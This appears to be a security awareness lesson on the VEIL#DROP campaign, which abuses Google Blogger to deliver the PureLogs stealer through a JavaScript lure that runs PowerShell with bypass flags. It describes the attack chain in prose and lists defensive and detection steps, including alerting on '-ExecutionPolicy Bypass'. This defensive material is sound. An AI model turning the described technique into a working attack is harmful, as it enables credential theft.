Back to all lessons
Awareness Lessons
4 days ago

VEIL#DROP Abuses Google Blogger to Deliver PureLogs Stealer via Social Engineering

The VEIL#DROP campaign exploits trusted cloud infrastructure — specifically Google's Blogger platform — to host and deliver malicious payloads, effectively bypassing domain reputation and network-based defenses. The attack chain begins with a socially engineered JavaScript file that executes PowerShell with security bypasses, demonstrating how user interaction with untrusted files remains a critical entry point. By blending malicious traffic with legitimate Google service communications, the attackers make detection significantly harder for traditional security tools. This matters because even well-defended organizations may inadvertently allowlist traffic to Google's infrastructure, creating a blind spot that sophisticated threat actors actively exploit.

Tactical Insight

Immediate actions

  • Block or heavily scrutinize PowerShell execution policies and alert on any use of execution bypass flags (e.g., `-ExecutionPolicy Bypass`) in endpoint security tooling.
  • Apply application control policies to prevent untrusted JavaScript files from executing outside sanctioned browsers or runtime environments.
  • Review proxy and firewall rules to inspect and log outbound requests to blogging platforms and generic cloud hosting services for anomalous payload patterns.

Long-term improvements

  • Implement a robust security awareness training program that specifically covers social engineering lures delivered via JavaScript or Office-adjacent files.
  • Enforce the principle of least privilege so that standard user accounts cannot invoke PowerShell or download and execute remote payloads without escalation.
  • Develop and maintain an approved-applications allowlist to prevent unapproved scripting runtimes and interpreters from running on endpoints.

Detection measures

  • Deploy SIEM rules to correlate PowerShell spawning from browser or email processes with subsequent outbound HTTP/S requests to cloud blogging domains.
  • Enable script-block logging and PowerShell transcription logging on all endpoints and forward logs to a centralized SIEM for real-time alerting.
  • Use DNS filtering solutions to flag or block requests to known content-hosting platforms when initiated by non-browser processes.